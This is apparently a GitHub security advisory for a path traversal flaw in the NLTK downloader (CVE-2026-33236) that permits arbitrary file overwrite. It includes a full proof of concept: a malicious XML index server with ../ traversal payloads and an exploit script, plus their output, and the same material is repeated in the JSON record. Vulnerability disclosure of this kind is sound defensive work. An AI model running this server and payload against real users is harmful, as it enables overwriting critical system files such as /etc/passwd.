GHSA-469J-VMHF-R6V7
Vulnerability from github – Published: 2026-03-19 12:42 – Updated: 2026-03-25 18:21
VLAI?
Summary
NLTK has a Downloader Path Traversal Vulnerability (AFO) - Arbitrary File Overwrite
Details
Vulnerability Description
The NLTK downloader does not validate the subdir and id attributes when processing remote XML index files. Attackers can control a remote XML index server to provide malicious values containing path traversal sequences (such as ../), which can lead to:
- Arbitrary Directory Creation: Create directories at arbitrary locations in the file system
- Arbitrary File Creation: Create arbitrary files
- Arbitrary File Overwrite: Overwrite critical system files (such as
/etc/passwd,~/.ssh/authorized_keys, etc.)
Vulnerability Principle
Key Code Locations
1. XML Parsing Without Validation (nltk/downloader.py:253)
self.filename = os.path.join(subdir, id + ext)
subdirandidare directly from XML attributes without any validation
2. Path Construction Without Checks (nltk/downloader.py:679)
filepath = os.path.join(download_dir, info.filename)
- Directly uses
filenamewhich may contain path traversal
3. Unrestricted Directory Creation (nltk/downloader.py:687)
os.makedirs(os.path.join(download_dir, info.subdir), exist_ok=True)
- Can create arbitrary directories outside the download directory
4. File Writing Without Protection (nltk/downloader.py:695)
with open(filepath, "wb") as outfile:
- Can write to arbitrary locations in the file system
Attack Chain
1. Attacker controls remote XML index server
↓
2. Provides malicious XML: <package id="passwd" subdir="../../etc" .../>
↓
3. Victim executes: downloader.download('passwd')
↓
4. Package.fromxml() creates object, filename = "../../etc/passwd.zip"
↓
5. _download_package() constructs path: download_dir + "../../etc/passwd.zip"
↓
6. os.makedirs() creates directory: download_dir + "../../etc"
↓
7. open(filepath, "wb") writes file to /etc/passwd.zip
↓
8. System file is overwritten!
Impact Scope
- System File Overwrite
Reproduction Steps
Environment Setup
- Install NLTK
pip install nltk
- Prepare malicious server and exploit script (see PoC section)
Reproduction Process
Step 1: Start malicious server
python3 malicious_server.py
Step 2: Run exploit script
python3 exploit_vulnerability.py
Step 3: Verify results
ls -la /tmp/test_file.zip
Proof of Concept
Malicious Server (malicious_server.py)
#!/usr/bin/env python3
"""Malicious HTTP Server - Provides XML index with path traversal"""
import os
import tempfile
import zipfile
from http.server import HTTPServer, BaseHTTPRequestHandler
# Create temporary directory
server_dir = tempfile.mkdtemp(prefix="nltk_malicious_")
# Create malicious XML (contains path traversal)
malicious_xml = """<?xml version="1.0"?>
<nltk_data>
<packages>
<package id="test_file" subdir="../../../../../../../../../tmp"
url="http://127.0.0.1:8888/test.zip"
size="100" unzipped_size="100" unzip="0"/>
</packages>
</nltk_data>
"""
# Save files
with open(os.path.join(server_dir, "malicious_index.xml"), "w") as f:
f.write(malicious_xml)
with zipfile.ZipFile(os.path.join(server_dir, "test.zip"), "w") as zf:
zf.writestr("test.txt", "Path traversal attack!")
# HTTP Handler
class Handler(BaseHTTPRequestHandler):
def do_GET(self):
if self.path == '/malicious_index.xml':
self.send_response(200)
self.send_header('Content-type', 'application/xml')
self.end_headers()
with open(os.path.join(server_dir, 'malicious_index.xml'), 'rb') as f:
self.wfile.write(f.read())
elif self.path == '/test.zip':
self.send_response(200)
self.send_header('Content-type', 'application/zip')
self.end_headers()
with open(os.path.join(server_dir, 'test.zip'), 'rb') as f:
self.wfile.write(f.read())
else:
self.send_response(404)
self.end_headers()
def log_message(self, format, *args):
pass
# Start server
if __name__ == "__main__":
port = 8888
server = HTTPServer(("0.0.0.0", port), Handler)
print(f"Malicious server started: http://127.0.0.1:{port}/malicious_index.xml")
print("Press Ctrl+C to stop")
try:
server.serve_forever()
except KeyboardInterrupt:
print("\nServer stopped")
Exploit Script (exploit_vulnerability.py)
#!/usr/bin/env python3
"""AFO Vulnerability Exploit Script"""
import os
import tempfile
def exploit(server_url="http://127.0.0.1:8888/malicious_index.xml"):
download_dir = tempfile.mkdtemp(prefix="nltk_exploit_")
print(f"Download directory: {download_dir}")
# Exploit vulnerability
from nltk.downloader import Downloader
downloader = Downloader(server_index_url=server_url, download_dir=download_dir)
downloader.download("test_file", quiet=True)
# Check results
expected_path = "/tmp/test_file.zip"
if os.path.exists(expected_path):
print(f"\n✗ Exploit successful! File written to: {expected_path}")
print(f"✗ Path traversal attack successful!")
else:
print(f"\n? File not found, download may have failed")
if __name__ == "__main__":
exploit()
Execution Results
✗ Exploit successful! File written to: /tmp/test_file.zip
✗ Path traversal attack successful!
Severity ?
8.1 (High)
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "nltk"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "3.9.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-33236"
],
"database_specific": {
"cwe_ids": [
"CWE-22"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-19T12:42:42Z",
"nvd_published_at": "2026-03-20T23:16:47Z",
"severity": "HIGH"
},
"details": "## Vulnerability Description\n\nThe NLTK downloader does not validate the `subdir` and `id` attributes when processing remote XML index files. Attackers can control a remote XML index server to provide malicious values containing path traversal sequences (such as `../`), which can lead to:\n\n1. **Arbitrary Directory Creation**: Create directories at arbitrary locations in the file system\n2. **Arbitrary File Creation**: Create arbitrary files\n3. **Arbitrary File Overwrite**: Overwrite critical system files (such as `/etc/passwd`, `~/.ssh/authorized_keys`, etc.)\n\n## Vulnerability Principle\n\n### Key Code Locations\n\n**1. XML Parsing Without Validation** (`nltk/downloader.py:253`)\n```python\nself.filename = os.path.join(subdir, id + ext)\n```\n- `subdir` and `id` are directly from XML attributes without any validation\n\n**2. Path Construction Without Checks** (`nltk/downloader.py:679`)\n```python\nfilepath = os.path.join(download_dir, info.filename)\n```\n- Directly uses `filename` which may contain path traversal\n\n**3. Unrestricted Directory Creation** (`nltk/downloader.py:687`)\n```python\nos.makedirs(os.path.join(download_dir, info.subdir), exist_ok=True)\n```\n- Can create arbitrary directories outside the download directory\n\n**4. File Writing Without Protection** (`nltk/downloader.py:695`)\n```python\nwith open(filepath, \"wb\") as outfile:\n```\n- Can write to arbitrary locations in the file system\n\n### Attack Chain\n\n```\n1. Attacker controls remote XML index server\n \u2193\n2. Provides malicious XML: \u003cpackage id=\"passwd\" subdir=\"../../etc\" .../\u003e\n \u2193\n3. Victim executes: downloader.download(\u0027passwd\u0027)\n \u2193\n4. Package.fromxml() creates object, filename = \"../../etc/passwd.zip\"\n \u2193\n5. _download_package() constructs path: download_dir + \"../../etc/passwd.zip\"\n \u2193\n6. os.makedirs() creates directory: download_dir + \"../../etc\"\n \u2193\n7. open(filepath, \"wb\") writes file to /etc/passwd.zip\n \u2193\n8. System file is overwritten!\n```\n\n## Impact Scope\n1. **System File Overwrite**\n\n## Reproduction Steps\n\n### Environment Setup\n\n1. Install NLTK\n```bash\npip install nltk\n```\n\n2. Prepare malicious server and exploit script (see PoC section)\n\n### Reproduction Process\n\n**Step 1: Start malicious server**\n```bash\npython3 malicious_server.py\n```\n\n**Step 2: Run exploit script**\n```bash\npython3 exploit_vulnerability.py\n```\n\n**Step 3: Verify results**\n```bash\nls -la /tmp/test_file.zip\n```\n\n## Proof of Concept\n\n### Malicious Server (malicious_server.py)\n\n```python\n#!/usr/bin/env python3\n\"\"\"Malicious HTTP Server - Provides XML index with path traversal\"\"\"\nimport os\nimport tempfile\nimport zipfile\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\n\n# Create temporary directory\nserver_dir = tempfile.mkdtemp(prefix=\"nltk_malicious_\")\n\n# Create malicious XML (contains path traversal)\nmalicious_xml = \"\"\"\u003c?xml version=\"1.0\"?\u003e\n\u003cnltk_data\u003e\n \u003cpackages\u003e\n \u003cpackage id=\"test_file\" subdir=\"../../../../../../../../../tmp\" \n url=\"http://127.0.0.1:8888/test.zip\" \n size=\"100\" unzipped_size=\"100\" unzip=\"0\"/\u003e\n \u003c/packages\u003e\n\u003c/nltk_data\u003e\n\"\"\"\n\n# Save files\nwith open(os.path.join(server_dir, \"malicious_index.xml\"), \"w\") as f:\n f.write(malicious_xml)\n\nwith zipfile.ZipFile(os.path.join(server_dir, \"test.zip\"), \"w\") as zf:\n zf.writestr(\"test.txt\", \"Path traversal attack!\")\n\n# HTTP Handler\nclass Handler(BaseHTTPRequestHandler):\n def do_GET(self):\n if self.path == \u0027/malicious_index.xml\u0027:\n self.send_response(200)\n self.send_header(\u0027Content-type\u0027, \u0027application/xml\u0027)\n self.end_headers()\n with open(os.path.join(server_dir, \u0027malicious_index.xml\u0027), \u0027rb\u0027) as f:\n self.wfile.write(f.read())\n elif self.path == \u0027/test.zip\u0027:\n self.send_response(200)\n self.send_header(\u0027Content-type\u0027, \u0027application/zip\u0027)\n self.end_headers()\n with open(os.path.join(server_dir, \u0027test.zip\u0027), \u0027rb\u0027) as f:\n self.wfile.write(f.read())\n else:\n self.send_response(404)\n self.end_headers()\n \n def log_message(self, format, *args):\n pass\n\n# Start server\nif __name__ == \"__main__\":\n port = 8888\n server = HTTPServer((\"0.0.0.0\", port), Handler)\n print(f\"Malicious server started: http://127.0.0.1:{port}/malicious_index.xml\")\n print(\"Press Ctrl+C to stop\")\n try:\n server.serve_forever()\n except KeyboardInterrupt:\n print(\"\\nServer stopped\")\n```\n\n### Exploit Script (exploit_vulnerability.py)\n\n```python\n#!/usr/bin/env python3\n\"\"\"AFO Vulnerability Exploit Script\"\"\"\nimport os\nimport tempfile\n\ndef exploit(server_url=\"http://127.0.0.1:8888/malicious_index.xml\"):\n download_dir = tempfile.mkdtemp(prefix=\"nltk_exploit_\")\n print(f\"Download directory: {download_dir}\")\n \n # Exploit vulnerability\n from nltk.downloader import Downloader\n downloader = Downloader(server_index_url=server_url, download_dir=download_dir)\n downloader.download(\"test_file\", quiet=True)\n \n # Check results\n expected_path = \"/tmp/test_file.zip\"\n if os.path.exists(expected_path):\n print(f\"\\n\u2717 Exploit successful! File written to: {expected_path}\")\n print(f\"\u2717 Path traversal attack successful!\")\n else:\n print(f\"\\n? File not found, download may have failed\")\n\nif __name__ == \"__main__\":\n exploit()\n```\n\n### Execution Results\n\n```\n\u2717 Exploit successful! File written to: /tmp/test_file.zip\n\u2717 Path traversal attack successful!\n```",
"id": "GHSA-469j-vmhf-r6v7",
"modified": "2026-03-25T18:21:27Z",
"published": "2026-03-19T12:42:42Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/nltk/nltk/security/advisories/GHSA-469j-vmhf-r6v7"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33236"
},
{
"type": "WEB",
"url": "https://github.com/nltk/nltk/commit/89fe2ec2c6bae6e2e7a46dad65cc34231976ed8a"
},
{
"type": "PACKAGE",
"url": "https://github.com/nltk/nltk"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "NLTK has a Downloader Path Traversal Vulnerability (AFO) - Arbitrary File Overwrite"
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…